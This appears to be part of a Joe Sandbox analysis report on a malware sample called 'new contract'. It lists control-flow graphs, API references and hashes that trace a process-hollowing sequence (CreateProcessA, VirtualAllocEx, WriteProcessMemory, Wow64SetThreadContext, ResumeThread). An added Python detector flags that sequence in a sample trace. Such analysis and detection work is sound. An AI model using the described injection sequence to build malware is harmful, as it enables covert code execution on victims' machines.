• Opcode Fuzzy Hash: 2d8af62de57a5b3ffd6f4d3ea970e86def40f1b3dbe5938d1d33b49fdf1a4766
• Instruction Fuzzy Hash: B9329DB57112059FDB54EB69C490BAEB7FAAF88304F6444ADE106DB3A0CB35ED01CB61

Control-flow Graph
                                                                                                                                                                            control_flow_graph 555 7984370-7984375 556 7984318-7984337 ResumeThread 555->556 557 7984377-79843c3 555->557 559 7984339-798433f 556->559 560 7984340-7984365 556->560 564 79843d3-7984403 Wow64SetThreadContext 557->564 565 79843c5-79843d1 557->565 559->560 568 798440c-798443c 564->568 569 7984405-798440b 564->569 565->564 569->568
APIs
• ResumeThread.KERNELBASE ref: 0798432A
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079843F6
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: Thread$ContextResumeWow64
• String ID:
• API String ID: 1826235168-0
• Opcode ID: 5d2209b4a1d51620e82ba7303916c24b0f56a84318d65155f784edb3fbb57e1e
• Instruction ID: a209eda0af6a440c3668982e278596d36b38a12c745d161f4760c3b08c122045
• Opcode Fuzzy Hash: 5d2209b4a1d51620e82ba7303916c24b0f56a84318d65155f784edb3fbb57e1e
• Instruction Fuzzy Hash: 5D3188B19003498FDB10EFAAC8857EEBBF4EF48324F14842AD459A7251C7789945CFA1
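The functions dumped in this report chain CreateProcessA, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread against the same child process, which is the classic process-hollowing sequence the report's signature list flags. The following is an added detection example, not part of the Joe Sandbox report or of the sample: it scans an ordered API-call trace and flags every caller/target pair that completes the sequence in order, ignoring a process that only writes its own memory and a launcher that resumes a child without first rewriting it. The trace format (`pid=… api=… target=…`), the pids in the sample trace, and the alternate API names accepted for each step are constructed assumptions; the sandbox's own trace format is different.

```python
"""Flag the process-hollowing API sequence in an ordered API-call trace.

Added example: the trace format, pids and alternate API names are
constructed for this demonstration and are not Joe Sandbox output.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Ordered steps of classic hollowing. Each step is satisfied by any name in
# its tuple so that Win32, WoW64 and Nt* spellings are all recognised.
# (Alternate names are assumptions added here, not taken from the report.)
HOLLOWING_STEPS: Tuple[Tuple[str, ...], ...] = (
    ("CreateProcessA", "CreateProcessW"),
    ("VirtualAllocEx", "NtAllocateVirtualMemory"),
    ("WriteProcessMemory", "NtWriteVirtualMemory"),
    ("Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"),
    ("ResumeThread", "NtResumeThread"),
)


@dataclass(frozen=True)
class ApiCall:
    caller: int   # pid that issued the call
    api: str      # API name as logged
    target: int   # pid the handle refers to (the new child for CreateProcess*)


def parse_trace(text: str) -> List[ApiCall]:
    """Parse 'pid=<n> api=<name> target=<n>' lines; '#' lines are comments."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        calls.append(ApiCall(int(fields["pid"]), fields["api"], int(fields["target"])))
    return calls


def find_hollowing(calls: List[ApiCall]) -> Dict[Tuple[int, int], List[str]]:
    """Return {(caller, target): [apis matched]} for each pair that completed
    every step of HOLLOWING_STEPS in order. Order matters: a ResumeThread
    logged before the memory writes does not advance the match, and calls a
    process makes against itself (caller == target) are ignored."""
    progress: Dict[Tuple[int, int], List[str]] = defaultdict(list)
    hits: Dict[Tuple[int, int], List[str]] = {}
    for call in calls:
        if call.caller == call.target:
            continue
        key = (call.caller, call.target)
        if key in hits:
            continue                      # already fully matched
        matched = progress[key]
        if call.api in HOLLOWING_STEPS[len(matched)]:
            matched.append(call.api)
            if len(matched) == len(HOLLOWING_STEPS):
                hits[key] = list(matched)
    return hits


# Constructed sample trace: pid 4100 hollows its child 4188 (the sequence
# seen in this report, including the extra ReadProcessMemory, which the
# detector tolerates); pid 2200 merely launches and resumes a child; pid 3300
# only touches its own memory. Only the first pair should be flagged.
SAMPLE_TRACE = """\
# pid = caller, target = process the handle refers to
pid=4100 api=CreateProcessA target=4188
pid=4100 api=ReadProcessMemory target=4188
pid=4100 api=VirtualAllocEx target=4188
pid=4100 api=WriteProcessMemory target=4188
pid=4100 api=WriteProcessMemory target=4188
pid=4100 api=Wow64SetThreadContext target=4188
pid=4100 api=ResumeThread target=4188
pid=2200 api=CreateProcessA target=2260
pid=2200 api=ResumeThread target=2260
pid=3300 api=VirtualAllocEx target=3300
pid=3300 api=WriteProcessMemory target=3300
"""


if __name__ == "__main__":
    for (caller, target), apis in find_hollowing(parse_trace(SAMPLE_TRACE)).items():
        print(f"pid {caller} hollowed pid {target}: {' -> '.join(apis)}")
```

The ordered match is deliberately strict: it is the combination of writing a suspended child's memory and then replacing its thread context before the first ResumeThread that distinguishes hollowing from an ordinary launcher or a debugger, so each of those steps has to appear, in that order, against the same target.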

Control-flow Graph
                                                                                                                                                                            control_flow_graph 747 7984b8d-7984b95 748 7984b38-7984b52 747->748 749 7984b97-7984c2d 747->749 757 7984b5b-7984b80 748->757 758 7984b54-7984b5a 748->758 753 7984c2f-7984c39 749->753 754 7984c66-7984c86 749->754 753->754 756 7984c3b-7984c3d 753->756 766 7984c88-7984c92 754->766 767 7984cbf-7984cee 754->767 759 7984c3f-7984c49 756->759 760 7984c60-7984c63 756->760 758->757 762 7984c4b 759->762 763 7984c4d-7984c5c 759->763 760->754 762->763 763->763 769 7984c5e 763->769 766->767 768 7984c94-7984c96 766->768 776 7984cf0-7984cfa 767->776 777 7984d27-7984de1 CreateProcessA 767->777 770 7984c98-7984ca2 768->770 771 7984cb9-7984cbc 768->771 769->760 774 7984ca4 770->774 775 7984ca6-7984cb5 770->775 771->767 774->775 775->775 778 7984cb7 775->778 776->777 779 7984cfc-7984cfe 776->779 788 7984dea-7984e70 777->788 789 7984de3-7984de9 777->789 778->771 781 7984d00-7984d0a 779->781 782 7984d21-7984d24 779->782 783 7984d0c 781->783 784 7984d0e-7984d1d 781->784 782->777 783->784 784->784 786 7984d1f 784->786 786->782 799 7984e80-7984e84 788->799 800 7984e72-7984e76 788->800 789->788 802 7984e94-7984e98 799->802 803 7984e86-7984e8a 799->803 800->799 801 7984e78 800->801 801->799 805 7984ea8-7984eac 802->805 806 7984e9a-7984e9e 802->806 803->802 804 7984e8c 803->804 804->802 808 7984ebe-7984ec5 805->808 809 7984eae-7984eb4 805->809 806->805 807 7984ea0 806->807 807->805 810 7984edc 808->810 811 7984ec7-7984ed6 808->811 809->808 813 7984edd 810->813 811->810 813->813
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07984DCE
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: e9785259361077a66c4b1bb5fe1fd68cec7d591c89f43a60cf3244fbce643221
• Instruction ID: d9dab88b97d767aca6fb81fcca4c35ae730926860366c1686da729b743720c6a
• Opcode Fuzzy Hash: e9785259361077a66c4b1bb5fe1fd68cec7d591c89f43a60cf3244fbce643221
• Instruction Fuzzy Hash: 12A16CB1D0025ACFDB50EFA8C840BDDBBB6BF48314F14856AD849A7260DB749985CF91

Control-flow Graph
                                                                                                                                                                            control_flow_graph 814 7984b98-7984c2d 816 7984c2f-7984c39 814->816 817 7984c66-7984c86 814->817 816->817 818 7984c3b-7984c3d 816->818 824 7984c88-7984c92 817->824 825 7984cbf-7984cee 817->825 819 7984c3f-7984c49 818->819 820 7984c60-7984c63 818->820 822 7984c4b 819->822 823 7984c4d-7984c5c 819->823 820->817 822->823 823->823 827 7984c5e 823->827 824->825 826 7984c94-7984c96 824->826 833 7984cf0-7984cfa 825->833 834 7984d27-7984de1 CreateProcessA 825->834 828 7984c98-7984ca2 826->828 829 7984cb9-7984cbc 826->829 827->820 831 7984ca4 828->831 832 7984ca6-7984cb5 828->832 829->825 831->832 832->832 835 7984cb7 832->835 833->834 836 7984cfc-7984cfe 833->836 845 7984dea-7984e70 834->845 846 7984de3-7984de9 834->846 835->829 838 7984d00-7984d0a 836->838 839 7984d21-7984d24 836->839 840 7984d0c 838->840 841 7984d0e-7984d1d 838->841 839->834 840->841 841->841 843 7984d1f 841->843 843->839 856 7984e80-7984e84 845->856 857 7984e72-7984e76 845->857 846->845 859 7984e94-7984e98 856->859 860 7984e86-7984e8a 856->860 857->856 858 7984e78 857->858 858->856 862 7984ea8-7984eac 859->862 863 7984e9a-7984e9e 859->863 860->859 861 7984e8c 860->861 861->859 865 7984ebe-7984ec5 862->865 866 7984eae-7984eb4 862->866 863->862 864 7984ea0 863->864 864->862 867 7984edc 865->867 868 7984ec7-7984ed6 865->868 866->865 870 7984edd 867->870 868->867 870->870
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07984DCE
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 4d3d90270505a6f5fbb7ad7001837146842c554b966fcf1b0a37e911d9c4ab29
• Instruction ID: 3ec5e7e47735183f0454f6530fdcc6a75319f4dc92ed77581c8cdc2d3f1015e4
• Opcode Fuzzy Hash: 4d3d90270505a6f5fbb7ad7001837146842c554b966fcf1b0a37e911d9c4ab29
• Instruction Fuzzy Hash: 89915BB1D0025ACFDF54DF68C840BEDBBB6BF48314F1485AAD809A7260DB749985CF91

Control-flow Graph
                                                                                                                                                                            control_flow_graph 871 14bada8-14badb7 872 14badb9-14badc6 call 14ba0cc 871->872 873 14bade3-14bade7 871->873 879 14badc8 872->879 880 14baddc 872->880 875 14badfb-14bae3c 873->875 876 14bade9-14badf3 873->876 882 14bae49-14bae57 875->882 883 14bae3e-14bae46 875->883 876->875 926 14badce call 14bb040 879->926 927 14badce call 14bb030 879->927 880->873 884 14bae7b-14bae7d 882->884 885 14bae59-14bae5e 882->885 883->882 890 14bae80-14bae87 884->890 887 14bae69 885->887 888 14bae60-14bae67 call 14ba0d8 885->888 886 14badd4-14badd6 886->880 889 14baf18-14bafd8 886->889 892 14bae6b-14bae79 887->892 888->892 921 14bafda-14bafdd 889->921 922 14bafe0-14bb00b GetModuleHandleW 889->922 893 14bae89-14bae91 890->893 894 14bae94-14bae9b 890->894 892->890 893->894 897 14baea8-14baeaa call 14ba0e8 894->897 898 14bae9d-14baea5 894->898 900 14baeaf-14baeb1 897->900 898->897 902 14baebe-14baec3 900->902 903 14baeb3-14baebb 900->903 904 14baee1-14baeee 902->904 905 14baec5-14baecc 902->905 903->902 912 14baf11-14baf17 904->912 913 14baef0-14baf0e 904->913 905->904 907 14baece-14baede call 14ba0f8 call 14ba108 905->907 907->904 913->912 921->922 923 14bb00d-14bb013 922->923 924 14bb014-14bb028 922->924 923->924 926->886 927->886
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 014BAFFE
Memory Dump Source
• Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 00b1c6e31183f896d252711daa031ad5ac39fa41c7ea71b20d35b5b67a48e55e
• Instruction ID: 02648befb9262ea1296581e062b6f123600a2f43bd0a071e14ae8cbdb857ecae
• Opcode Fuzzy Hash: 00b1c6e31183f896d252711daa031ad5ac39fa41c7ea71b20d35b5b67a48e55e
• Instruction Fuzzy Hash: A87127B0A10B058FD724DF29D49479ABBF1FF88214F10892ED58AD7B50D735E949CBA0

Control-flow Graph (graph image not recoverable)
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014B59C9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 1d44575ae3ca704e7ca5e3c78c9d18c2571a0d9f4e25610040020fb807d3ad25
                                                                                                                                                                            • Instruction ID: 84eea424b7c193807bd9f64757691b898f37dcde920021fd66c1d1c36881ba2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d44575ae3ca704e7ca5e3c78c9d18c2571a0d9f4e25610040020fb807d3ad25
                                                                                                                                                                            • Instruction Fuzzy Hash: EF41B3B0C0071DCBDB24DFA9C884ADEFBB6BF49314F20806AD519AB251DB756949CF90

Control-flow Graph (graph image not recoverable)
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 014B59C9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 88ce914626f28cae7717882a6261e088e78e4d05ebdd1acc4b144c61f855d349
                                                                                                                                                                            • Instruction ID: 238887846e70104dcdf2d8f73a17811a8701ab3c4988c43750ce781c156710c6
                                                                                                                                                                            • Opcode Fuzzy Hash: 88ce914626f28cae7717882a6261e088e78e4d05ebdd1acc4b144c61f855d349
                                                                                                                                                                            • Instruction Fuzzy Hash: AE41D2B0C00719CBDB24CFA9C884BDEFBB2BF49314F20806AD509AB255DB75694ACF50

Control-flow Graph (graph image not recoverable)
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 07986F5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                            • Opcode ID: 968571a6d03cfaca989bab1ffc7b6b1fcc3acd86394c5e4548507324ef68fb72
                                                                                                                                                                            • Instruction ID: 6fc5b2a4babd1ec7918b6f49ebce9aa7f14dfc5c1e906e1feb8426d8e12dbff8
                                                                                                                                                                            • Opcode Fuzzy Hash: 968571a6d03cfaca989bab1ffc7b6b1fcc3acd86394c5e4548507324ef68fb72
                                                                                                                                                                            • Instruction Fuzzy Hash: E13169B68003499FDB10EF99D849BDEFFF8EB48324F10844AD559A7252C375A544CFA1

Control-flow Graph (graph image not recoverable)
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079849A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: ee372c363018e1a1bd2326db7235080b2a52eae704ad655d794776cede4a816c
                                                                                                                                                                            • Instruction ID: b6871cfcb590cac6fd54153ffcb254f0314e52983877563244d482ad0b7ad564
                                                                                                                                                                            • Opcode Fuzzy Hash: ee372c363018e1a1bd2326db7235080b2a52eae704ad655d794776cede4a816c
                                                                                                                                                                            • Instruction Fuzzy Hash: 102157B590035A9FCB10DFA9C884BDEBBF5FF48314F14842AE959A7250C779A944CF60

Control-flow Graph (graph image not recoverable)
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079849A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: 762111bf8c7277861de63e095f17ef917c92a78fea69227e0bce4be8a82c7518
                                                                                                                                                                            • Instruction ID: d1faa3ba1a19c2c97ff206852a840d78e0a6285837d7368603c84d13da670d85
                                                                                                                                                                            • Opcode Fuzzy Hash: 762111bf8c7277861de63e095f17ef917c92a78fea69227e0bce4be8a82c7518
                                                                                                                                                                            • Instruction Fuzzy Hash: 192157B59003599FCF10DFAAC885BDEBBF5FF88314F10842AE959A7250C7789944CBA0

Control-flow Graph (graph image not recoverable)
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07984A80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            • Opcode ID: 706aaab9f8621e5d74309542eef7eca45196ef413c19f3a06e52f19109b73cf4
                                                                                                                                                                            • Instruction ID: 4b640b24d0519bf81a77b53e1663c4aef6628cc3a60d88fd7f482593effb00a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 706aaab9f8621e5d74309542eef7eca45196ef413c19f3a06e52f19109b73cf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 4B2148B68003499FCB10DFAAC885AEEFFF5FF48320F50842AE559A7251C7349944CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014BD656,?,?,?,?,?), ref: 014BD717
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: 319dd8dbacdcb6c81edbb0df34a65e40ecabb12730f69a7bf790e9bd90d6b74f
                                                                                                                                                                            • Instruction ID: 9206e55bdeff7306b2539df8af26d291ce6e2439bd7bd8c82572fb54128dde74
                                                                                                                                                                            • Opcode Fuzzy Hash: 319dd8dbacdcb6c81edbb0df34a65e40ecabb12730f69a7bf790e9bd90d6b74f
                                                                                                                                                                            • Instruction Fuzzy Hash: 0321E6B5D003489FDB10CF9AD884ADEBFF4EB48314F14845AE918A3350D374A954DFA5
                                                                                                                                                                            APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079843F6
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: eab35a86e7e38f40b671804bdfe8539e8a22b79d134bb200f14e89187d19916e
• Instruction ID: 3c305b4bd2e5de16197d45791f896158c07417667bbda24c3dab737928e4cb88
• Opcode Fuzzy Hash: eab35a86e7e38f40b671804bdfe8539e8a22b79d134bb200f14e89187d19916e
• Instruction Fuzzy Hash: D82179B1D003098FDB14DFAAC8857EEBBF4EF48324F14842AD459A7240CB789944CFA0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07984A80
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 81f4aad11ba3f5c0e76c984b23d0144c7cbede14bcb5b75655b4a2d41453219a
• Instruction ID: 7f0e05f9c5b567ae426d08f8e865922a919cb48bdd5d7785347378e597092ef2
• Opcode Fuzzy Hash: 81f4aad11ba3f5c0e76c984b23d0144c7cbede14bcb5b75655b4a2d41453219a
• Instruction Fuzzy Hash: A52128B18003499FCB10DFAAC845AEEFBF5FF48314F50842AE559A7250C7349944DBA5
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014BD656,?,?,?,?,?), ref: 014BD717
Memory Dump Source
• Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: e70f4c0f6323f39191acee7ed3857eaf9ac1bafb44de2af2d8e422bfcdacddbd
• Instruction ID: b51fa077405125461697824e78a13058c9ca6be310de6e2420d137f23de40d52
• Opcode Fuzzy Hash: e70f4c0f6323f39191acee7ed3857eaf9ac1bafb44de2af2d8e422bfcdacddbd
• Instruction Fuzzy Hash: 1221E2B5D002489FDB10CFA9D985AEEBBF5FB48324F14841AE918B3351C378A954CF60
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079844BE
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: bb117e8abb4ea0d3b86b2cb5949d119dada8d8b737452d5c2fe03ff4caa3f213
• Instruction ID: 1758bfbacd71c032857475773b409ed3b71781a94385d2ab412f4dcf80fd4e5a
• Opcode Fuzzy Hash: bb117e8abb4ea0d3b86b2cb5949d119dada8d8b737452d5c2fe03ff4caa3f213
• Instruction Fuzzy Hash: 1E1159B68003499FCB14DFAAD845ADEFFF5EF48324F24881AE519A7250C775A944CFA0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,077B3402,?,?,?,?,?), ref: 077B34A7
Memory Dump Source
• Source File: 00000000.00000002.1744265645.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: true
• Associated: 00000000.00000002.1744229333.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_77a0000_new contract.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
• Opcode ID: 6f20ded290180a36e73dd2d26d6ad78df492cb94c97c37c393f3ed9e95665304
• Instruction ID: de8a5bd9507280d0383eb2f7dd748b453e0b275ceaeb838c3441d9f331afb15e
• Opcode Fuzzy Hash: 6f20ded290180a36e73dd2d26d6ad78df492cb94c97c37c393f3ed9e95665304
• Instruction Fuzzy Hash: FB116AB580034D9FDB10DF9AC844BEEBFF8EB48320F14841AE914A3250C335A994DFA4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 83c35bbbae0fee2cbaa222945840c4b030732261fdd72f77111d7f314c7d45bc
• Instruction ID: fc96c7c52230030451e93a9a51c97950294cc20899314f8696e4c620e5718780
• Opcode Fuzzy Hash: 83c35bbbae0fee2cbaa222945840c4b030732261fdd72f77111d7f314c7d45bc
• Instruction Fuzzy Hash: B31146B59003498BCB10DFAAD8457EEFFF5AF88324F24841AD559A7250CB35A944CBA4
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079844BE
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: d53a81a252908c2b44d6e452b0bcc8c5eafbfb2b9fb7e221ff65666fa44b8d82
• Instruction ID: 8722527217dc846544e8911e2d47c862c1841f48b0d92c70fd2e787a8fbde2d1
• Opcode Fuzzy Hash: d53a81a252908c2b44d6e452b0bcc8c5eafbfb2b9fb7e221ff65666fa44b8d82
• Instruction Fuzzy Hash: 2F1137B59003499FCB10DFAAC845ADFBFF5EF88324F148819E519A7250C775A954CFA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: f9bd088055926112e11e41ff0e2ada0e27860de28e1f0a7c23064bb9c8e02fd5
• Instruction ID: 8cf12a9b15faced57b42031c75d8c037f714d0517dcc561920a1a237f1793a5b
• Opcode Fuzzy Hash: f9bd088055926112e11e41ff0e2ada0e27860de28e1f0a7c23064bb9c8e02fd5
• Instruction Fuzzy Hash: 561136B19003498FDB10DFAAC8457EEFBF9EF88324F24841AD519A7250CB75A944CFA4
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07986F5D
Memory Dump Source
• Source File: 00000000.00000002.1744322616.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7980000_new contract.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 3e3fa33b5a22da090b662fa2b768cb5f1cfabbfa90a31ff0c78b9eca2ff5f325
• Instruction ID: b249e40269d2f56fe149664e467ecbf04249e850d38587d044f2a33abaa3a58a
• Opcode Fuzzy Hash: 3e3fa33b5a22da090b662fa2b768cb5f1cfabbfa90a31ff0c78b9eca2ff5f325
• Instruction Fuzzy Hash: B61136B58003489FCB10DF99C849BDEBBF8EB48314F10841AE519A7201C374A944CFA5
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 014BAFFE
Memory Dump Source
• Source File: 00000000.00000002.1740410536.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_new contract.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 5db8c0890ee12e3d9969a3161e58fb021d1778561e9dd39ed84d9dfff49a7ea7
• Instruction ID: 89fa229f77c923fb13c1a46675e214b1215aec86c494413a01e8b96cfbff4c1e
• Opcode Fuzzy Hash: 5db8c0890ee12e3d9969a3161e58fb021d1778561e9dd39ed84d9dfff49a7ea7
• Instruction Fuzzy Hash: 6F11E0B5C007498FDB14DF9AC844ADEFBF4EB88324F10841AD929A7760D375A545CFA1
Memory Dump Source
• Source File: 00000000.00000002.1739909013.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_123d000_new contract.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 85dbdcb4ac24dd0799d147b0a82944ad5b4da1bc81eefd401891438bb0a075a7
• Instruction ID: 2f81a259eac3038eae176fff84e0f15354eac92b11fb7b4ff65dcad6e4d9631d
• Opcode Fuzzy Hash: 85dbdcb4ac24dd0799d147b0a82944ad5b4da1bc81eefd401891438bb0a075a7
• Instruction Fuzzy Hash: 992148B1610209DFCB01DF58E8C0B26BF65FBC4318F60C569E9090B286C336D416C7A1
Memory Dump Source
